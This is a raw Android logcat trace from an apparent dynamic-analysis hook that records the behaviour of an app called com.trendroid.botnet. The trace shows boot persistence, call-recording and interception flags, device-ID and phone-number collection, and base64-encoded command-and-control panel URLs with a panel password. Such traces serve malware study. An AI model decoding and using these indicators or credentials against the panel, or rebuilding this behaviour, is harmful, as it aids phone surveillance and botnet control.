D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 2249): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/com.trendroid.botnet-1/base.apk]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/cache]
D/S4URC   ( 2249): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/com.trendroid.botnet/cache]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/cache]
D/S4URC   ( 2249): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{com.trendroid.botnet/com.trendroid.connect.Trendroid}]
D/S4URC   ( 2249): [SDK] [android.app.ActivityManager] [getRunningServices]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.BOOT_COMPLETED,android.intent.action.SCREEN_OFF,
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][inacall] [Value][0]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs]
D/S4URC   ( 2249): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Timeout] [Return][0]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][Timeout] [Value][10000]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml] [DesFile][/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][RecordCalls] [Return][false]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][RecordCalls] [Return][false]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][RecordCalls] [Value][true]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml] [DesFile][/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][intercept] [Return][false]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][intercept] [Return][false]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][intercept] [Value][false]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml] [DesFile][/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][AndroidID] [Return][]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][AndroidID] [Return][]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][AndroidID] [Value][9dd4736125bf4d04]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml] [DesFile][/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][File] [Return][]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][File] [Return][]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 2249): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][File] [Value][/storage/sdcard0/System]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml] [DesFile][/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][urlPost] [Return][]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][urlPost] [Return][]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][urlPost] [Value][/message.php?]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml] [DesFile][/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][backupURL] [Return][]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][backupURL] [Return][]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][backupURL] [Value][aHR0cDovL3RyZW5kcm9pZGJvdG5ldGFybXkuc2l0ZTUwLm5ldC9QYW5lbA==]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml] [DesFile][/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://settings/system/enable_stylus_gestures]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][Start] [Return][false]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][Start] [Value][true]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][Media] [Value][false]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][Files] [Value][false]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml] [DesFile][/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][URL] [Value][aHR0cDovL25hbmRyb2lkLnVwaGVyby5jb20vUGFuZWw=]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml] [DesFile][/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][backupURL] [Value][aHR0cDovL3RyZW5kcm9pZGJvdG5ldGFybXkuc2l0ZTUwLm5ldC9QYW5lbA==]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][password] [Value][YW5vbnltb3VzMTI=]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml] [DesFile][/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][androidId] [Value][9dd4736125bf4d04]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml] [DesFile][/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml]
D/S4URC   ( 2249): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.trendroid.botnet/shared_prefs/com.trendroid.botnet_preferences.xml.bak]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][URL] [Return][aHR0cDovL25hbmRyb2lkLnVwaGVyby5jb20vUGFuZWw=]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2249): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][com.trendroid.botnet_preferences.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][password] [Return][YW5vbnltb3VzMTI=]
D/S4URC   ( 2249): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLSocketFactoryImpl]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 2249): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 2249): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLMessageDigestJDK$MD5]
